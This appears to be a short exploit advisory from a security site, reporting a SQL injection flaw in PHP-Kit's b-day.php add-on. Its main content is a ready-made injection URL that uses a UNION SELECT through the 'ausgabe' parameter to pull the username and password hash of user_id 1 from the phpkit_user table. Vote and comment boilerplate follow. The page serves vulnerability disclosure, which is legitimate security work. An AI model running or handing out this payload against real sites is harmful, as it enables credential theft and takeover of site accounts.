The PHP-Kit b-day.php add-on SQL injection vulnerability

2010.03.23
Credit: n3w7u
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

.-=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-. ~ Phpkit addon (b-day.php) SQL Injection Vulnerability ~ .-=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-. [+] Autor: n3w7u [+] Vulnerabilities [ SQL Injection ] [+] Language: [ PHP ] [+] Date: 22.03.2010 .-=--=--=--=--=--=--=--=--=--=--=-. [+] Vulnerability include.php?path=b-day.php&ausgabe= [+] Exploitable http://[host]/[path]/include.php?path=b-day.php&ausgabe=11+uNIoN+sElECt+1,concat(user_name,0x3a,user_pw),3,4,5,6+from+phpkit_user+where+user_id=1--


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top